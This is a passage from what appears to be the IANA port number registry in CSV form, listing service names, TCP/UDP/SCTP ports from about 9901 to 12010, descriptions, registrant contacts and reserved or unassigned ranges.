channel,,,,,,,, enrp-sctp,9901,sctp,enrp server channel,,,,,[RFC5353],,, enrp-sctp-tls,9902,sctp,enrp/tls server channel,,,,,[RFC5353],,, ,9903,tcp,Reserved,,,,,,,, multicast-ping,9903,udp,Multicast Ping Protocol,,,,2011-12-09,[RFC6450],,, ,9904-9908,,Unassigned,,,,,,,, domaintime,9909,tcp,domaintime,[Jeffry_Dwight],[Jeffry_Dwight],,,,,, domaintime,9909,udp,domaintime,[Jeffry_Dwight],[Jeffry_Dwight],,,,,, ,9910,,Unassigned,,,,,,,, sype-transport,9911,tcp,SYPECom Transport Protocol,[Sylvain_Pedneault],[Sylvain_Pedneault],2003-03,,,,, sype-transport,9911,udp,SYPECom Transport Protocol,[Sylvain_Pedneault],[Sylvain_Pedneault],2003-03,,,,, ,9912-9924,,Unassigned,,,,,,,, xybrid-cloud,9925,tcp,XYBRID Cloud,[Rx_Networks_Inc_2],[Drew_Davies_2],2013-04-25,,,,, ,9925,udp,Reserved,,,,,,,, ,9926-9949,,Unassigned,,,,,,,, apc-9950,9950,tcp,APC 9950,[American_Power_Conve],[American_Power_Conve],,,,,, apc-9950,9950,udp,APC 9950,[American_Power_Conve],[American_Power_Conve],,,,,, apc-9951,9951,tcp,APC 9951,[American_Power_Conve],[American_Power_Conve],,,,,, apc-9951,9951,udp,APC 9951,[American_Power_Conve],[American_Power_Conve],,,,,, apc-9952,9952,tcp,APC 9952,[American_Power_Conve],[American_Power_Conve],,,,,, apc-9952,9952,udp,APC 9952,[American_Power_Conve],[American_Power_Conve],,,,,, acis,9953,tcp,9953,[Thomas_Guth],[Thomas_Guth],2006-01,,,,, acis,9953,udp,9953,[Thomas_Guth],[Thomas_Guth],2006-01,,,,, hinp,9954,tcp,HaloteC Instrument Network Protocol,[HaloteC_Instruments],[Michel_Stam],2012-02-07,,,,, ,9954,udp,Reserved,,,,,,,, alljoyn-stm,9955,tcp,Contact Port for AllJoyn standard messaging,[Qualcomm_Innovation_Center],[Craig_Dowell],2012-03-14,,,,, alljoyn-mcm,9955,udp,Contact Port for AllJoyn multiplexed constrained messaging,[Qualcomm_Innovation_Center],[Craig_Dowell],2012-03-14,,,,, ,9956,tcp,Reserved,,,,,,,, alljoyn,9956,udp,Alljoyn Name Service,[Qualcomm_Innovation_Center],[Craig_Dowell],2011-12-21,,,,, ,9957-9965,,Unassigned,,,,,,,, odnsp,9966,tcp,OKI Data Network Setting Protocol,[Masato_Sato],[Masato_Sato],2006-05,,,,, odnsp,9966,udp,OKI Data Network Setting Protocol,[Masato_Sato],[Masato_Sato],2006-05,,,,, ,9967-9977,,Unassigned,,,,,,,, xybrid-rt,9978,tcp,XYBRID RT Server,[Rx_Networks_Inc],[Drew_Davies],2013-01-24,,,,, ,9978,udp,Reserved,,,,,,,, ,9979-9986,,Unassigned,,,,,,,, dsm-scm-target,9987,tcp,DSM/SCM Target Interface,[Mike_Dyslin],[Mike_Dyslin],2006-08,,,,, dsm-scm-target,9987,udp,DSM/SCM Target Interface,[Mike_Dyslin],[Mike_Dyslin],2006-08,,,,, nsesrvr,9988,tcp,Software Essentials Secure HTTP server,[Narayanan_Raju],[Narayanan_Raju],2009-02-05,,,,, ,9988,udp,Reserved,,,,,,,, ,9989-9989,,Unassigned,,,,,,,, osm-appsrvr,9990,tcp,OSM Applet Server,[Vinay_Gupta],[Vinay_Gupta],2003-08,,,,, osm-appsrvr,9990,udp,OSM Applet Server,[Vinay_Gupta],[Vinay_Gupta],2003-08,,,,, osm-oev,9991,tcp,OSM Event Server,[Vinay_Gupta],[Vinay_Gupta],2003-08,,,,, osm-oev,9991,udp,OSM Event Server,[Vinay_Gupta],[Vinay_Gupta],2003-08,,,,, palace-1,9992,tcp,OnLive-1,[Douglas_Crockford],[Douglas_Crockford],,,,,, palace-1,9992,udp,OnLive-1,[Douglas_Crockford],[Douglas_Crockford],,,,,, palace-2,9993,tcp,OnLive-2,[Douglas_Crockford],[Douglas_Crockford],,,,,, palace-2,9993,udp,OnLive-2,[Douglas_Crockford],[Douglas_Crockford],,,,,, palace-3,9994,tcp,OnLive-3,[Douglas_Crockford],[Douglas_Crockford],,,,,, palace-3,9994,udp,OnLive-3,[Douglas_Crockford],[Douglas_Crockford],,,,,, palace-4,9995,tcp,Palace-4,[Douglas_Crockford],[Douglas_Crockford],,,,,, palace-4,9995,udp,Palace-4,[Douglas_Crockford],[Douglas_Crockford],,,,,, palace-5,9996,tcp,Palace-5,[Douglas_Crockford],[Douglas_Crockford],,,,,, palace-5,9996,udp,Palace-5,[Douglas_Crockford],[Douglas_Crockford],,,,,, palace-6,9997,tcp,Palace-6,[Douglas_Crockford],[Douglas_Crockford],,,,,, palace-6,9997,udp,Palace-6,[Douglas_Crockford],[Douglas_Crockford],,,,,, distinct32,9998,tcp,Distinct32,[Anoop_Tewari],[Anoop_Tewari],,,,,, distinct32,9998,udp,Distinct32,[Anoop_Tewari],[Anoop_Tewari],,,,,, distinct,9999,tcp,distinct,[Anoop_Tewari],[Anoop_Tewari],,,,,, distinct,9999,udp,distinct,[Anoop_Tewari],[Anoop_Tewari],,,,,, ndmp,10000,tcp,Network Data Management Protocol,[Brian_Ehrmantraut],[Brian_Ehrmantraut],,,,,, ndmp,10000,udp,Network Data Management Protocol,[Brian_Ehrmantraut],[Brian_Ehrmantraut],,,,,, scp-config,10001,tcp,SCP Configuration,[Michael_Benz],[Michael_Benz],2010-08-06,,,,, scp-config,10001,udp,SCP Configuration,[Michael_Benz],[Michael_Benz],2010-08-06,,,,, documentum,10002,tcp,EMC-Documentum Content Server Product,[Reza_Bagherian],[Reza_Bagherian],2007-07-19,,,,, documentum,10002,udp,EMC-Documentum Content Server Product,[Reza_Bagherian],[Reza_Bagherian],2007-07-19,,,,, documentum-s,10003,tcp,"EMC-Documentum Content Server Product IANA assigned this well-formed service name as a replacement for ""documentum_s"".",[Reza_Bagherian],[Reza_Bagherian],2007-07-19,,,,, documentum_s,10003,tcp,EMC-Documentum Content Server Product,[Reza_Bagherian],[Reza_Bagherian],2007-07-19,,,,,"This entry is an alias to ""documentum-s"". This entry is now historic, not usable for use with many common service discovery mechanisms." documentum-s,10003,udp,"EMC-Documentum Content Server Product IANA assigned this well-formed service name as a replacement for ""documentum_s"".",[Reza_Bagherian],[Reza_Bagherian],2007-07-19,,,,, documentum_s,10003,udp,EMC-Documentum Content Server Product,[Reza_Bagherian],[Reza_Bagherian],2007-07-19,,,,,"This entry is an alias to ""documentum-s"". This entry is now historic, not usable for use with many common service discovery mechanisms." emcrmirccd,10004,tcp,EMC Replication Manager Client,[Robert_Boudrie],[Robert_Boudrie],2008-06-09,,,,, ,10004,udp,Reserved,,,,,,,, emcrmird,10005,tcp,EMC Replication Manager Server,[Robert_Boudrie],[Robert_Boudrie],2008-06-09,,,,, ,10005,udp,Reserved,,,,,,,, ,10006,,Unassigned,,,,,,,, mvs-capacity,10007,tcp,MVS Capacity,[Donna_Dillenberger],[Donna_Dillenberger],,,,,, mvs-capacity,10007,udp,MVS Capacity,[Donna_Dillenberger],[Donna_Dillenberger],,,,,, octopus,10008,tcp,Octopus Multiplexer,[Chris_Koeritz_2],[Chris_Koeritz_2],2002-10,,,,, octopus,10008,udp,Octopus Multiplexer,[Chris_Koeritz_2],[Chris_Koeritz_2],2002-10,,,,, swdtp-sv,10009,tcp,Systemwalker Desktop Patrol,[Akira_Ide],[Akira_Ide],2006-03,,,,, swdtp-sv,10009,udp,Systemwalker Desktop Patrol,[Akira_Ide],[Akira_Ide],2006-03,,,,, rxapi,10010,tcp,ooRexx rxapi services,[David_Ashley],[David_Ashley],2009-07-24,,,,, ,10010,udp,Reserved,,,,,,,, ,10011-10049,,Unassigned,,,,,,,, zabbix-agent,10050,tcp,Zabbix Agent,[Alexei_Vladishev],[Alexei_Vladishev],2006-02,,,,, zabbix-agent,10050,udp,Zabbix Agent,[Alexei_Vladishev],[Alexei_Vladishev],2006-02,,,,, zabbix-trapper,10051,tcp,Zabbix Trapper,[Alexei_Vladishev],[Alexei_Vladishev],2006-02,,,,, zabbix-trapper,10051,udp,Zabbix Trapper,[Alexei_Vladishev],[Alexei_Vladishev],2006-02,,,,, ,10052-10054,,Unassigned,,,,,,,, qptlmd,10055,tcp,Quantapoint FLEXlm Licensing Service,[Justin_Vegso],[Justin_Vegso],2010-07-01,,,,, ,10055,udp,Reserved,,,,,,,, ,10056-10079,,Unassigned,,,,,,,, amanda,10080,tcp,Amanda,[John_Jackson],[John_Jackson],,,,,, amanda,10080,udp,Amanda,[John_Jackson],[John_Jackson],,,,,, famdc,10081,tcp,FAM Archive Server,[Frode_Randers],[Frode_Randers],2006-01,,,,, famdc,10081,udp,FAM Archive Server,[Frode_Randers],[Frode_Randers],2006-01,,,,, ,10082-10099,,Unassigned,,,,,,,, itap-ddtp,10100,tcp,VERITAS ITAP DDTP,[Saugata_Guha],[Saugata_Guha],2004-05,,,,, itap-ddtp,10100,udp,VERITAS ITAP DDTP,[Saugata_Guha],[Saugata_Guha],2004-05,,,,, ezmeeting-2,10101,tcp,eZmeeting,[Albert_C_Yang],[Albert_C_Yang],2002-03,,,,, ezmeeting-2,10101,udp,eZmeeting,[Albert_C_Yang],[Albert_C_Yang],2002-03,,,,, ezproxy-2,10102,tcp,eZproxy,[Albert_C_Yang],[Albert_C_Yang],2002-03,,,,, ezproxy-2,10102,udp,eZproxy,[Albert_C_Yang],[Albert_C_Yang],2002-03,,,,, ezrelay,10103,tcp,eZrelay,[Albert_C_Yang],[Albert_C_Yang],2002-03,,,,, ezrelay,10103,udp,eZrelay,[Albert_C_Yang],[Albert_C_Yang],2002-03,,,,, swdtp,10104,tcp,Systemwalker Desktop Patrol,[Akira_Ide],[Akira_Ide],2006-09,,,,, swdtp,10104,udp,Systemwalker Desktop Patrol,[Akira_Ide],[Akira_Ide],2006-09,,,,, ,10105-10106,,Unassigned,,,,,,,, bctp-server,10107,tcp,"VERITAS BCTP, server",[Saugata_Guha],[Saugata_Guha],2004-05,,,,, bctp-server,10107,udp,"VERITAS BCTP, server",[Saugata_Guha],[Saugata_Guha],2004-05,,,,, ,10108-10109,,Unassigned,,,,,,,, nmea-0183,10110,tcp,NMEA-0183 Navigational Data,[Meindert_Sprang],[Meindert_Sprang],2009-02-18,,,,, nmea-0183,10110,udp,NMEA-0183 Navigational Data,[Meindert_Sprang],[Meindert_Sprang],2009-02-18,,,,, ,10111,tcp,Reserved,,,,,,,, nmea-onenet,10111,udp,NMEA OneNet multicast messaging,[National_Marine_Electronics_Association],[Steve_Spitzer],2011-09-15,,,,, ,10112,,Unassigned,,,,,,,, netiq-endpoint,10113,tcp,NetIQ Endpoint,[John_Wood],[John_Wood],,,,,, netiq-endpoint,10113,udp,NetIQ Endpoint,[John_Wood],[John_Wood],,,,,, netiq-qcheck,10114,tcp,NetIQ Qcheck,[Michael_Sharpe],[Michael_Sharpe],2010-09-14,,,,, netiq-qcheck,10114,udp,NetIQ Qcheck,[Michael_Sharpe],[Michael_Sharpe],2010-09-14,,,,, netiq-endpt,10115,tcp,NetIQ Endpoint,[Gary_Weichinger],[Gary_Weichinger],,,,,, netiq-endpt,10115,udp,NetIQ Endpoint,[Gary_Weichinger],[Gary_Weichinger],,,,,, netiq-voipa,10116,tcp,NetIQ VoIP Assessor,[Gary_Weichinger],[Gary_Weichinger],,,,,, netiq-voipa,10116,udp,NetIQ VoIP Assessor,[Gary_Weichinger],[Gary_Weichinger],,,,,, iqrm,10117,tcp,NetIQ IQCResource Managament Svc,[Michael_Sharpe],[Michael_Sharpe],2010-09-14,,,,, iqrm,10117,udp,NetIQ IQCResource Managament Svc,[Michael_Sharpe],[Michael_Sharpe],2010-09-14,,,,, ,10118-10127,,Unassigned,,,,,,,, bmc-perf-sd,10128,tcp,BMC-PERFORM-SERVICE DAEMON,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmc-perf-sd,10128,udp,BMC-PERFORM-SERVICE DAEMON,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmc-gms,10129,tcp,BMC General Manager Server,[Dima_Seliverstov],[Dima_Seliverstov],2009-07-28,,,,, ,10129,udp,Reserved,,,,,,,, ,10130-10159,,Unassigned,,,,,,,, qb-db-server,10160,tcp,QB Database Server,[Wei_Wang],[Wei_Wang],2005-11,,,,, qb-db-server,10160,udp,QB Database Server,[Wei_Wang],[Wei_Wang],2005-11,,,,, snmptls,10161,tcp,SNMP-TLS,,,,,[RFC6353],,, snmpdtls,10161,udp,SNMP-DTLS,,,,,[RFC6353],,, snmptls-trap,10162,tcp,SNMP-Trap-TLS,,,,,[RFC6353],,, snmpdtls-trap,10162,udp,SNMP-Trap-DTLS,,,,,[RFC6353],,, ,10163-10199,,Unassigned,,,,,,,, trisoap,10200,tcp,Trigence AE Soap Service,[Brigitte_Gagne],[Brigitte_Gagne],2006-08,,,,, trisoap,10200,udp,Trigence AE Soap Service,[Brigitte_Gagne],[Brigitte_Gagne],2006-08,,,,, rsms,10201,tcp,Remote Server Management Service,[Patrick_H_Piper],[Patrick_H_Piper],2009-03-06,,,,, rscs,10201,udp,Remote Server Control and Test Service,[Patrick_H_Piper],[Patrick_H_Piper],2009-03-06,,,,, ,10202-10251,,Unassigned,,,,,,,, apollo-relay,10252,tcp,Apollo Relay Port,[Anthony_Carrabino],[Anthony_Carrabino],2003-08,,,,, apollo-relay,10252,udp,Apollo Relay Port,[Anthony_Carrabino],[Anthony_Carrabino],2003-08,,,,, ,10253-10259,,Unassigned,,,,,,,, axis-wimp-port,10260,tcp,Axis WIMP Port,[Stefan_Eriksson],[Stefan_Eriksson],,,,,, axis-wimp-port,10260,udp,Axis WIMP Port,[Stefan_Eriksson],[Stefan_Eriksson],,,,,, ,10261-10287,,Unassigned,,,,,,,, blocks,10288,tcp,Blocks,[Carl_Malamud],[Carl_Malamud],,,,,, blocks,10288,udp,Blocks,[Carl_Malamud],[Carl_Malamud],,,,,, ,10289-10320,,Unassigned,,,,,,,, cosir,10321,tcp,Computer Op System Information Report,[Kevin_C_Barber],[Kevin_C_Barber],2009-01-13,,,,, ,10321,udp,Reserved,,,,,,,, ,10322-10438,,Unassigned,,,,,,,, bngsync,10439,udp,BalanceNG session table synchronization protocol,[Inlab_Software_GmbH],[Thomas_G._Obermair],2014-05-02,,,,, ,10439,tcp,Reserved,,,,,,,, ,10440-10499,,Unassigned,,,,,,,, ,10500,tcp,Reserved,,,,,,,, hip-nat-t,10500,udp,HIP NAT-Traversal,[Ari_Keranen],[Ari_Keranen],,,[RFC5770],,, ,10501-10539,,Unassigned,,,,,,,, MOS-lower,10540,tcp,MOS Media Object Metadata Port,[Eric_Thorniley],[Eric_Thorniley],2007-09-17,,,,, MOS-lower,10540,udp,MOS Media Object Metadata Port,[Eric_Thorniley],[Eric_Thorniley],2007-09-17,,,,, MOS-upper,10541,tcp,MOS Running Order Port,[Eric_Thorniley],[Eric_Thorniley],2007-09-17,,,,, MOS-upper,10541,udp,MOS Running Order Port,[Eric_Thorniley],[Eric_Thorniley],2007-09-17,,,,, MOS-aux,10542,tcp,MOS Low Priority Port,[Eric_Thorniley],[Eric_Thorniley],2007-09-17,,,,, MOS-aux,10542,udp,MOS Low Priority Port,[Eric_Thorniley],[Eric_Thorniley],2007-09-17,,,,, MOS-soap,10543,tcp,MOS SOAP Default Port,[Eric_Thorniley],[Eric_Thorniley],2007-09-17,,,,, MOS-soap,10543,udp,MOS SOAP Default Port,[Eric_Thorniley],[Eric_Thorniley],2007-09-17,,,,, MOS-soap-opt,10544,tcp,MOS SOAP Optional Port,[Eric_Thorniley],[Eric_Thorniley],2007-09-17,,,,, MOS-soap-opt,10544,udp,MOS SOAP Optional Port,[Eric_Thorniley],[Eric_Thorniley],2007-09-17,,,,, ,10545-10630,,Unassigned,,,,,,,, printopia,10631,tcp,"Port to allow for administration and control of ""Printopia"" application software, which provides printing services to mobile users",[Ecamm_Network_LLC],[Chris_Kent],2011-10-24,,,,, ,10631,udp,Reserved,,,,,,,, ,10632-10799,,Unassigned,,,,,,,, gap,10800,tcp,Gestor de Acaparamiento para Pocket PCs,[Juan_Carlos_Olivares],[Juan_Carlos_Olivares],2006-03,,,,, gap,10800,udp,Gestor de Acaparamiento para Pocket PCs,[Juan_Carlos_Olivares],[Juan_Carlos_Olivares],2006-03,,,,, ,10801-10804,,Unassigned,,,,,,,, lpdg,10805,tcp,LUCIA Pareja Data Group,[Alvaro_P_Dominguez],[Alvaro_P_Dominguez],2006-02,,,,, lpdg,10805,udp,LUCIA Pareja Data Group,[Alvaro_P_Dominguez],[Alvaro_P_Dominguez],2006-02,,,,, ,10806-10808,,Unassigned,,,,,,,, nbd,10809,tcp,Linux Network Block Device,[Wouter_Verhelst],[Wouter_Verhelst],2010-08-02,,,,, ,10809,udp,Reserved,,,,,,,, ,10810,tcp,Reserved,,,,,,,, nmc-disc,10810,udp,Nuance Mobile Care Discovery,[Gordon_Waddell],[Gordon_Waddell],2011-03-21,,,,, ,10811-10859,,Unassigned,,,,,,,, helix,10860,tcp,Helix Client/Server,[Matthew_Strange][Larry_Atkin_2],[Matthew_Strange][Larry_Atkin_2],2009-03-06,,,,, helix,10860,udp,Helix Client/Server,[Matthew_Strange][Larry_Atkin_2],[Matthew_Strange][Larry_Atkin_2],2009-03-06,,,,, ,10861-10879,,Unassigned,,,,,,,, bveapi,10880,tcp,BVEssentials HTTP API,[Tri_Tech_Computers_Ltd],[James_Emerton],2012-11-19,,,,, bveapi,10880,udp,BVEssentials HTTP API,[Tri_Tech_Computers_Ltd],[James_Emerton],2012-11-19,,,,, ,10881-10989,,Unassigned,,,,,,,, rmiaux,10990,tcp,Auxiliary RMI Port,[Eugen_Bacic_2],[Eugen_Bacic_2],,,,,, rmiaux,10990,udp,Auxiliary RMI Port,[Eugen_Bacic_2],[Eugen_Bacic_2],,,,,, ,10991-10999,,Unassigned,,,,,,,, irisa,11000,tcp,IRISA,[V_A_Brauner],[V_A_Brauner],,,,,, irisa,11000,udp,IRISA,[V_A_Brauner],[V_A_Brauner],,,,,, metasys,11001,tcp,Metasys,[Tobin_Schuster],[Tobin_Schuster],,,,,, metasys,11001,udp,Metasys,[Tobin_Schuster],[Tobin_Schuster],,,,,, ,11002-11022,,Unassigned,,,,,,,, cefd-vmp,10023,udp,Comtech EF-Data's Vipersat Management Protocol,[Comtech],[Nathan_Jeffords],2014-01-23,,,,, ,10023,tcp,Reserved,,,,,,,, ,11024-11094,,Unassigned,,,,,,,, weave,11095,tcp,Nest device-to-device and device-to-service application protocol,[Nest_Labs_Inc],[Grant_Erickson],2014-01-16,,,,, weave,11095,udp,Nest device-to-device and device-to-service application protocol,[Nest_Labs_Inc],[Grant_Erickson],2014-01-16,,,,, ,11096-11102,,Unassigned,,,,,,,, origo-sync,11103,tcp,OrigoDB Server Sync Interface,[Devrex_Labs],[Robert_Friberg],2013-03-29,,,,, ,11103,udp,Reserved,,,,,,,, netapp-icmgmt,11104,tcp,NetApp Intercluster Management,[Craig_Everhart],[Craig_Everhart],2010-07-06,,,,, ,11104,udp,Reserved,,,,,,,, netapp-icdata,11105,tcp,NetApp Intercluster Data,[Craig_Everhart],[Craig_Everhart],2010-07-06,,,,, ,11105,udp,Reserved,,,,,,,, sgi-lk,11106,tcp,SGI LK Licensing service,[Michel_Bourget],[Michel_Bourget],2009-01-06,,,,, sgi-lk,11106,udp,SGI LK Licensing service,[Michel_Bourget],[Michel_Bourget],2009-01-06,,,,, ,11107,,Unassigned,,,,,,,, myq-termlink,11108,udp,Hardware Terminals Discovery and Low-Level Communication Protocol,[JANUS_spol],[Jakub_Ahmadyar],2013-04-23,,,,, ,11108,tcp,Reserved,,,,,,,, sgi-dmfmgr,11109,tcp,Data migration facility Manager (DMF) is a browser based interface to DMF,[SGI],[John_Sygulla],2013-01-07,,,,, ,11109,udp,Reserved,,,,,,,, sgi-soap,11110,tcp,Data migration facility (DMF) SOAP is a web server protocol to support remote access to DMF,[SGI],[John_Sygulla],2013-01-07,,,,, ,11110,udp,Reserved,,,,,,,, vce,11111,tcp,Viral Computing Environment (VCE),[Fred_Cohen],[Fred_Cohen],,,,,, vce,11111,udp,Viral Computing Environment (VCE),[Fred_Cohen],[Fred_Cohen],,,,,, dicom,11112,tcp,DICOM,[David_Clunie],[David_Clunie],2005-08,,,,, dicom,11112,udp,DICOM,[David_Clunie],[David_Clunie],2005-08,,,,, ,11113-11160,,Unassigned,,,,,,,, suncacao-snmp,11161,tcp,sun cacao snmp access point,[Nick_Stephen],[Nick_Stephen],2005-08,,,,, suncacao-snmp,11161,udp,sun cacao snmp access point,[Nick_Stephen],[Nick_Stephen],2005-08,,,,, suncacao-jmxmp,11162,tcp,sun cacao JMX-remoting access point,[Nick_Stephen],[Nick_Stephen],2005-08,,,,, suncacao-jmxmp,11162,udp,sun cacao JMX-remoting access point,[Nick_Stephen],[Nick_Stephen],2005-08,,,,, suncacao-rmi,11163,tcp,sun cacao rmi registry access point,[Nick_Stephen],[Nick_Stephen],2005-08,,,,, suncacao-rmi,11163,udp,sun cacao rmi registry access point,[Nick_Stephen],[Nick_Stephen],2005-08,,,,, suncacao-csa,11164,tcp,sun cacao command-streaming access point,[Nick_Stephen],[Nick_Stephen],2005-08,,,,, suncacao-csa,11164,udp,sun cacao command-streaming access point,[Nick_Stephen],[Nick_Stephen],2005-08,,,,, suncacao-websvc,11165,tcp,sun cacao web service access point,[Nick_Stephen],[Nick_Stephen],2005-08,,,,, suncacao-websvc,11165,udp,sun cacao web service access point,[Nick_Stephen],[Nick_Stephen],2005-08,,,,, ,11166-11170,,Unassigned,,,,,,,, ,11171,tcp,Reserved,,,,,,,, snss,11171,udp,Surgical Notes Security Service Discovery (SNSS),[David_Lethe],[David_Lethe],2010-12-24,,,,, oemcacao-jmxmp,11172,tcp,OEM cacao JMX-remoting access point,[David_Sechrest],[David_Sechrest],2010-09-22,,,,, ,11172,udp,Reserved,,,,,,,, t5-straton,11173,tcp,Straton Runtime Programing,[COPALP],[Jerome_FOLLUT],2012-03-01,,,,, ,11173,udp,Reserved,,,,,,,, oemcacao-rmi,11174,tcp,OEM cacao rmi registry access point,[David_Sechrest],[David_Sechrest],2010-09-22,,,,, ,11174,udp,Reserved,,,,,,,, oemcacao-websvc,11175,tcp,OEM cacao web service access point,[David_Sechrest],[David_Sechrest],2010-09-22,,,,, ,11175,udp,Reserved,,,,,,,, ,11176-11200,,Unassigned,,,,,,,, smsqp,11201,tcp,smsqp,[Andres_Seco_Hernande],[Andres_Seco_Hernande],,,,,, smsqp,11201,udp,smsqp,[Andres_Seco_Hernande],[Andres_Seco_Hernande],,,,,, dcsl-backup,11202,tcp,DCSL Network Backup Services,[John_Reynolds],[John_Reynolds],2012-04-17,,,,,Defined TXT keys: DCSL-Service ,11202,udp,Reserved,,,,,,,, ,11203-11207,,Unassigned,,,,,,,, wifree,11208,tcp,WiFree Service,[Jose_Luis_Martin_Pei],[Jose_Luis_Martin_Pei],2006-03,,,,, wifree,11208,udp,WiFree Service,[Jose_Luis_Martin_Pei],[Jose_Luis_Martin_Pei],2006-03,,,,, ,11209-11210,,Unassigned,,,,,,,, memcache,11211,tcp,Memory cache service,[Trond_Norbye],[Trond_Norbye],2009-02-09,,,,, memcache,11211,udp,Memory cache service,[Trond_Norbye],[Trond_Norbye],2009-02-09,,,,, ,11212-11318,,Unassigned,,,,,,,, imip,11319,tcp,IMIP,[Len_Zuvela],[Len_Zuvela],,,,,, imip,11319,udp,IMIP,[Len_Zuvela],[Len_Zuvela],,,,,, imip-channels,11320,tcp,IMIP Channels Port,[Len_Zuvela_2],[Len_Zuvela_2],,,,,, imip-channels,11320,udp,IMIP Channels Port,[Len_Zuvela_2],[Len_Zuvela_2],,,,,, arena-server,11321,tcp,Arena Server Listen,[Earl_Brannigan],[Earl_Brannigan],,,,,, arena-server,11321,udp,Arena Server Listen,[Earl_Brannigan],[Earl_Brannigan],,,,,, ,11322-11366,,Unassigned,,,,,,,, atm-uhas,11367,tcp,ATM UHAS,[Todd_Barker],[Todd_Barker],,,,,, atm-uhas,11367,udp,ATM UHAS,[Todd_Barker],[Todd_Barker],,,,,, ,11368-11370,,Unassigned,,,,,,,, hkp,11371,tcp,OpenPGP HTTP Keyserver,[David_Shaw],[David_Shaw],2003-05,,,,, hkp,11371,udp,OpenPGP HTTP Keyserver,[David_Shaw],[David_Shaw],2003-05,,,,, ,11372-11429,,Unassigned,,,,,,,, lsdp,11430,udp,Lenbrook Service Discovery Protocol,[Lenbrook_Industries_Limited],[Kevin_Groeneveld],2014-03-27,,,,, ,11430,tcp,Reserved,,,,,,,, ,11431-11488,,Unassigned,,,,,,,Known UNAUTHORIZED USE: port 11488, asgcypresstcps,11489,tcp,ASG Cypress Secure Only,[David_Luxford],[David_Luxford],2010-07-01,,,,, ,11489,udp,Reserved,,,,,,,, ,11490-11599,,Unassigned,,,,,,,, tempest-port,11600,tcp,Tempest Protocol Port,[Francis_Cianfrocca],[Francis_Cianfrocca],,,,,, tempest-port,11600,udp,Tempest Protocol Port,[Francis_Cianfrocca],[Francis_Cianfrocca],,,,,, ,11601-11622,,Unassigned,,,,,,,, emc-xsw-dconfig,11623,tcp,EMC XtremSW distributed config,[EMC],[David_Erel],2013-09-18,,,,, ,11623,udp,Reserved,,,,,,,, ,11624-11719,,Unassigned,,,,,,,Unauthorized Use Known on port 11711, h323callsigalt,11720,tcp,H.323 Call Control Signalling Alternate,[ITU-T],[ITU-T_TSB],,2013-01-31,,,, h323callsigalt,11720,udp,H.323 Call Control Signalling Alternate,[ITU-T],[ITU-T_TSB],,2013-01-31,,,, ,11721-11722,,Unassigned,,,,,,,, emc-xsw-dcache,11723,tcp,EMC XtremSW distributed cache,[EMC],[David_Erel],2013-09-18,,,,, emc-xsw-dcache,11723,udp,EMC XtremSW distributed cache,[EMC],[David_Erel],2013-09-18,,,,, ,11724-11750,,Unassigned,,,,,,,, intrepid-ssl,11751,tcp,Intrepid SSL,[Robert_Eden],[Robert_Eden],2003-03,,,,, intrepid-ssl,11751,udp,Intrepid SSL,[Robert_Eden],[Robert_Eden],2003-03,,,,, ,11752-11795,,Unassigned,,,,,,,, lanschool,11796,tcp,LanSchool,[Stoneware_Inc],[Dana_Doggett],2012-05-18,,,,, lanschool-mpt,11796,udp,Lanschool Multipoint,[Stoneware_Inc],[Dana_Doggett],2012-05-18,,,,, ,11797-11875,,Unassigned,,,,,,,, xoraya,11876,tcp,X2E Xoraya Multichannel protocol,[Hannes_K],[Hannes_K],2010-09-13,,,,, xoraya,11876,udp,X2E Xoraya Multichannel protocol,[Hannes_K],[Hannes_K],2010-09-13,,,,, ,11877,tcp,Reserved,,,,,,,, x2e-disc,11877,udp,X2E service discovery protocol,[Hannes_K],[Hannes_K],2010-09-13,,,,, ,11878-11966,,Unassigned,,,,,,,, sysinfo-sp,11967,tcp,SysInfo Service Protocol,[Mike_Cooper],[Mike_Cooper],2003-03,,,,, sysinfo-sp,11967,udp,SysInfo Sercice Protocol,[Mike_Cooper],[Mike_Cooper],2003-03,,,,, ,11968-11996,,Unassigned,,,,,,,, wmereceiving,11997,sctp,WorldMailExpress,[Greg_Foutz],[Greg_Foutz],2006-03,,,,, wmedistribution,11998,sctp,WorldMailExpress,[Greg_Foutz],[Greg_Foutz],2006-03,,,,, wmereporting,11999,sctp,WorldMailExpress,[Greg_Foutz],[Greg_Foutz],2006-03,,,,, entextxid,12000,tcp,IBM Enterprise Extender SNA XID Exchange,[Eugene_Cox],[Eugene_Cox],,,,,, entextxid,12000,udp,IBM Enterprise Extender SNA XID Exchange,[Eugene_Cox],[Eugene_Cox],,,,,, entextnetwk,12001,tcp,IBM Enterprise Extender SNA COS Network Priority,[Eugene_Cox],[Eugene_Cox],,,,,, entextnetwk,12001,udp,IBM Enterprise Extender SNA COS Network Priority,[Eugene_Cox],[Eugene_Cox],,,,,, entexthigh,12002,tcp,IBM Enterprise Extender SNA COS High Priority,[Eugene_Cox],[Eugene_Cox],,,,,, entexthigh,12002,udp,IBM Enterprise Extender SNA COS High Priority,[Eugene_Cox],[Eugene_Cox],,,,,, entextmed,12003,tcp,IBM Enterprise Extender SNA COS Medium Priority,[Eugene_Cox],[Eugene_Cox],,,,,, entextmed,12003,udp,IBM Enterprise Extender SNA COS Medium Priority,[Eugene_Cox],[Eugene_Cox],,,,,, entextlow,12004,tcp,IBM Enterprise Extender SNA COS Low Priority,[Eugene_Cox],[Eugene_Cox],,,,,, entextlow,12004,udp,IBM Enterprise Extender SNA COS Low Priority,[Eugene_Cox],[Eugene_Cox],,,,,, dbisamserver1,12005,tcp,DBISAM Database Server - Regular,[Tim_Young],[Tim_Young],2002-05,,,,, dbisamserver1,12005,udp,DBISAM Database Server - Regular,[Tim_Young],[Tim_Young],2002-05,,,,, dbisamserver2,12006,tcp,DBISAM Database Server - Admin,[Tim_Young],[Tim_Young],2002-05,,,,, dbisamserver2,12006,udp,DBISAM Database Server - Admin,[Tim_Young],[Tim_Young],2002-05,,,,, accuracer,12007,tcp,Accuracer Database System Server,[Alexander_V_Ivanov],[Alexander_V_Ivanov],2004-12,,,,, accuracer,12007,udp,Accuracer Database System Server,[Alexander_V_Ivanov],[Alexander_V_Ivanov],2004-12,,,,, accuracer-dbms,12008,tcp,Accuracer Database System Admin,[Alexander_V_Ivanov],[Alexander_V_Ivanov],2004-12,,,,, accuracer-dbms,12008,udp,Accuracer Database System Admin,[Alexander_V_Ivanov],[Alexander_V_Ivanov],2004-12,,,,, ,12009,tcp,Reserved,,,,,,,, ghvpn,12009,udp,Green Hills VPN,[Green_Hills_Software],[Tom_R_Zavisca],2012-02-07,,,,, edbsrvr,12010,tcp,ElevateDB Server,[Tim_Young],[Tim_Young],2009-05-06,,,,, 